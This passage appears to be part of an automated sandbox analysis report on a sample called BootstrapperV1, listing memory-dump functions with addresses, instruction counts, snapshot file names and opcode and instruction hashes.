                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f62afbd2800118bb01044c002b682a6c20573885e3ef2270aa3aa808162b5fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F910C92A0DAD64FE312BB7CD8999E83FB0EF42256F0841F7C18D871A3DD19240783A5
                                                                                                                                                                                                                                              Function 00007FFB4B0E7135 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f16d0060d67cc719b716bb61ddd4b0334672d93d5d8041d46e25d3c1df33059b
                                                                                                                                                                                                                                              • Instruction ID: 83901651544d5d22a27eeb20dc59628e11e8a4453fd55185b15cf8354f9024af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f16d0060d67cc719b716bb61ddd4b0334672d93d5d8041d46e25d3c1df33059b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA71E971A1CA488FDB55EF6CD8955A97BE1FFA8711B04017EE54AC7361DD20A802C7C2
                                                                                                                                                                                                                                              Function 00007FFB4B0E7138 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bb0e7cb311968ebd91547eff20a084cb853d418eef8955549773556ed387a16f
                                                                                                                                                                                                                                              • Instruction ID: 72d045a82e5cbf6e2a9e36611928fed54466ea5d3b7e7740504390b795f25cd5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb0e7cb311968ebd91547eff20a084cb853d418eef8955549773556ed387a16f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1571E971A1CA488FDB55EF6CD8955A97BE1FFA8711B04017EE58AC7361DE20A802C781
                                                                                                                                                                                                                                              Function 00007FFB4B0F7E69 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5b0a1a09ce12f60e500a195ae098d0186956110f9f7d14df47037e00d6555499
                                                                                                                                                                                                                                              • Instruction ID: 0d708cd23aeb711675bf8bd13ad57e3fe9bf18e22887de089218603061961f6e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b0a1a09ce12f60e500a195ae098d0186956110f9f7d14df47037e00d6555499
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F719061B0DB468BE7396E78D9418F177D1EF41312B14C2BEC58B832A7E958BC478382
                                                                                                                                                                                                                                              Function 00007FFB4B0E7148 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fb9565ad64a83340e50329c006ce722a362b10b27fcaad40f1ba52518d5b0dc5
                                                                                                                                                                                                                                              • Instruction ID: 4fea5de4194584160a06bc92910301d65f55f38cdef25f03ae8a8d47e61654b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb9565ad64a83340e50329c006ce722a362b10b27fcaad40f1ba52518d5b0dc5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F71DB71A1CA488FDB59EF6CD8955AD7BE1FF68701B04017EE48AD7361DE20E801C782
                                                                                                                                                                                                                                              Function 00007FFB4B0FAC50 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3fce9adc0428326505170c88de5d2537b2a07e5009d0076ec2975869142adffd
                                                                                                                                                                                                                                              • Instruction ID: cbf4e9ce2461bf28cf2852a97ea469ebe5741f0a98647e47a549cdb5b9e6d53b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fce9adc0428326505170c88de5d2537b2a07e5009d0076ec2975869142adffd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F881FCA2A0DBD64FE313AB7CD8955E83FB0EF52256F0841F7C1898B1A3DD59240787A1
                                                                                                                                                                                                                                              Function 00007FFB4B0E7158 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 82a2c3d6caf0316c39252b240f64bdee83d4970d8b3815ec8bbc56c0f998a7f1
                                                                                                                                                                                                                                              • Instruction ID: f439cc73b2ddd7a68404a2d1466daf2f10f5bcb6478187829ae22b8381e8dd2e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82a2c3d6caf0316c39252b240f64bdee83d4970d8b3815ec8bbc56c0f998a7f1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A271C671A1CA489FDB59EB6CD8955A97BE1FF68701B0401BEE48AD3361DE20AC01C782
                                                                                                                                                                                                                                              Function 00007FFB4B0E48C8 Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: aa9ed46e8b5b4c9de485d2a41cb39d8dddfc62a6ef690406ea15fc9bf2c56e87
                                                                                                                                                                                                                                              • Instruction ID: f4393a091f66830cd8643b5258198696531ac5b8cd50ea6be54b992bb3be06f2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa9ed46e8b5b4c9de485d2a41cb39d8dddfc62a6ef690406ea15fc9bf2c56e87
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 868127A0B0C60A4BF764BE38C544AB973D1EF45312F04C27AC18EC73E2DDAD6845A391
                                                                                                                                                                                                                                              Function 00007FFB4B0E7118 Relevance: .2, Instructions: 247COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f2c25a0e325120e6ce9a7a992882fcf32ed845f4dc35aee679e5eed4674113e4
                                                                                                                                                                                                                                              • Instruction ID: 67b013768075f885c6d747edaef5c990601e97b35e578bafaeba3c8095af8590
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2c25a0e325120e6ce9a7a992882fcf32ed845f4dc35aee679e5eed4674113e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64713861B0DB894FE765AB3CD8197B57BD1EF9A211F0484FEC08EC72A2DE646846C341
                                                                                                                                                                                                                                              Function 00007FFB4B0EBA30 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9f4674342d57010bad71494a86bf2e7e2d17fe1815712cfde3181ef48bc157fe
                                                                                                                                                                                                                                              • Instruction ID: 1e8d7935adec2072e37f7c4d6e7f8ee83594147ad4f7d7d8f03bfd71d131e814
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f4674342d57010bad71494a86bf2e7e2d17fe1815712cfde3181ef48bc157fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59517CA2B1DE4A4FF7D9EA7CD4D927527D1EF98252B1840BAD54DC33A2ED18DC428340
                                                                                                                                                                                                                                              Function 00007FFB4B0F0A15 Relevance: .2, Instructions: 233COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 93486aecb5c0a5144a1b8c4b061513808cb5b56500ebf2e0ece3c25f1b1cf912
                                                                                                                                                                                                                                              • Instruction ID: ef3f9daaaf8c10fa597689491cb2d8ff422a78c2651418cb90b9e01fdec42a78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93486aecb5c0a5144a1b8c4b061513808cb5b56500ebf2e0ece3c25f1b1cf912
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E71C2B1A0CA8D8FDB85EF7CC495AE97BF1FF59301B0441B6D448DB2A6DE34A8458740
                                                                                                                                                                                                                                              Function 00007FFB4B0E6115 Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a3919f0077dbb59a54dd2b622ae3adba05f93e32a7e630b3ae972e895da0f63a
                                                                                                                                                                                                                                              • Instruction ID: 5bfde4e19538c97d070deffc16c35f63072fe12dea31178acf54065ec327df6f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3919f0077dbb59a54dd2b622ae3adba05f93e32a7e630b3ae972e895da0f63a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD61E8A260CE4A5FF794BE3CC459376B7D1FFA8351F4446BDD189C32A1DE28A8468381
                                                                                                                                                                                                                                              Function 00007FFB4B0F21FE Relevance: .2, Instructions: 228COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c118b5f93e9e1c891da24d0a0ce4e562e5a8f8481e15f2d824a91dea9e2a1324
                                                                                                                                                                                                                                              • Instruction ID: a6c02048f5daf24f592a4988fce304c966ea32c618103922a3129b1a7f80ef1d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c118b5f93e9e1c891da24d0a0ce4e562e5a8f8481e15f2d824a91dea9e2a1324
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9761F760B1CA994FDB95EF3CC455AB97BD1EF69351F0441FAF489C72A3CD18A8428381
                                                                                                                                                                                                                                              Function 00007FFB4B0E1259 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c61d7c33c73403fb5bfb0e0cadcbe37bea1200c93e9f9aa315b8face98de4ec0
                                                                                                                                                                                                                                              • Instruction ID: 35a62e3b7acc608c2cbb3cca9610dfbe2a238fc8c7db72d96c74277666193a01
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c61d7c33c73403fb5bfb0e0cadcbe37bea1200c93e9f9aa315b8face98de4ec0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B06138A1A0EAC91FD396EB7CC8655A47FE1EF5625170D84FAD0C8CB2B3E9189C19C341
                                                                                                                                                                                                                                              Function 00007FFB4B0E47B0 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b595f527b3d78286b09da4b40146b319adcb783f9b6ded905c0c9803711ea63e
                                                                                                                                                                                                                                              • Instruction ID: 3648469ba37e81b120a4de5d28693e2503b3a59703ec335268b0d259700b2ec0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b595f527b3d78286b09da4b40146b319adcb783f9b6ded905c0c9803711ea63e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F61427060CB454BD768EE28C586AB5B7E1FF95342F10857ED08AC73A2DE64F8068781
                                                                                                                                                                                                                                              Function 00007FFB4B0EED3A Relevance: .2, Instructions: 208COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 81192fba4d33f16f830d9a58db80342dea376841bfee205beb57052e1a817654
                                                                                                                                                                                                                                              • Instruction ID: 91363164db50cb1a2cbc09bc13d55b5898c4bbd64cef236f236339d621f2668d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81192fba4d33f16f830d9a58db80342dea376841bfee205beb57052e1a817654
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2651296160EA8A0FE799AB7CC8556B57FD1EF4A211B0845FED0CEC72F3D91958428340
                                                                                                                                                                                                                                              Function 00007FFB4B0E7A48 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1b1d53a84dff44fb35593f4aad2f3b0bcf2a89f6dfa0dd7ade97af8042a44d74
                                                                                                                                                                                                                                              • Instruction ID: 7dbd1ad5ca4e85dba0c6f57fedef2c9b999488563f10713536d1d6db073bd02c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b1d53a84dff44fb35593f4aad2f3b0bcf2a89f6dfa0dd7ade97af8042a44d74
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10515DA2B0DA8A0FE395EA3C89556757FD1DF5A26171841FED18DC72A3DC149C178380
                                                                                                                                                                                                                                              Function 00007FFB4B0EF060 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9cc6989b31eccd13b3158bdf8ab30e7b249d4c4337e819e014548cf99d034886
                                                                                                                                                                                                                                              • Instruction ID: 1d1e2361ef3197a5d415fd608355760bac99fca320df6065d69346b8cc43b405
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cc6989b31eccd13b3158bdf8ab30e7b249d4c4337e819e014548cf99d034886
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38513BA160DA8A4FF765FA3CC4511A47FD1DFDA311B0485FAD1C8C76B7D918AC068381
                                                                                                                                                                                                                                              Function 00007FFB4B0F1AF1 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a668760d95680a7296411e0c2279067ca4aa0635fc5d6c8778d3d13437978721
                                                                                                                                                                                                                                              • Instruction ID: 329cfbc2b46f49ae0d6c5934dae0955a2180f580b07734a61b98995358b734c4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a668760d95680a7296411e0c2279067ca4aa0635fc5d6c8778d3d13437978721
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B751EE6070C9498FDB99EE2CC855A7537D2EF99312B0440BAD84EC72A7DD68EC52C380
                                                                                                                                                                                                                                              Function 00007FFB4B0EB76D Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8b41b7d1291afe431781e2518d866c6a3dbc498f74d10b816bcd0aead55d86a8
                                                                                                                                                                                                                                              • Instruction ID: c879d8fb05b8e5738fb9e05f4d2ea600fa70f6d26e0cfb10139207ac5f16a8eb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b41b7d1291afe431781e2518d866c6a3dbc498f74d10b816bcd0aead55d86a8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A41387270DA0E0FE798E96CE9916B573C1EB99331B0441BAD58DC7396DD15EC42C380
                                                                                                                                                                                                                                              Function 00007FFB4B0E5638 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c2575e7a1a115bc688e7c7774d02d51395087594284122ffe9dc5a07c2f2c78a
                                                                                                                                                                                                                                              • Instruction ID: b23cc9beb4a21483c5b36b57b888ec3c43d6093449097ca5db57d922226e8031
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2575e7a1a115bc688e7c7774d02d51395087594284122ffe9dc5a07c2f2c78a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53415D52A0EA8A5FD342BB7CF8956F63BE1DF8222670882F7D0CDC6197DC0894468390
                                                                                                                                                                                                                                              Function 00007FFB4B0E91A0 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 46c0dc67ff94f44697f46c6d5c189cb1e261030dd3c5267000f71d6e7157a449
                                                                                                                                                                                                                                              • Instruction ID: 56b1abc262f97dcd26d283194bc330569eee10cad21c39ea549b32bb3bfcfd26
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46c0dc67ff94f44697f46c6d5c189cb1e261030dd3c5267000f71d6e7157a449
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2841E1B061CA0A5FD769EF38C985A62B7E0FF98305B54467DD58DC3266DA34F8828780
                                                                                                                                                                                                                                              Function 00007FFB4B0E2BE8 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b48d3c7b66c3e7e81052ec398c9d72f0459a1713f50af7477c64aaaa66b8bc33
                                                                                                                                                                                                                                              • Instruction ID: decbe1b352a4466ad404e3b66548659977512e73a34804766b4477ea46864c41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b48d3c7b66c3e7e81052ec398c9d72f0459a1713f50af7477c64aaaa66b8bc33
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F14113A1A0D9596FD795FB6C98547BD3BE1EF99321B0881B6E00DC73A6CD189C018381
                                                                                                                                                                                                                                              Function 00007FFB4B0E8C85 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ae90c75912de5ff13f99c4b62bfc5001512a23917135ea87cf2314fdeac5d243
                                                                                                                                                                                                                                              • Instruction ID: 74b9e25e804a715712d4d54a6f3c3891aeb0c3a60da063f465048761daed9f48
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae90c75912de5ff13f99c4b62bfc5001512a23917135ea87cf2314fdeac5d243
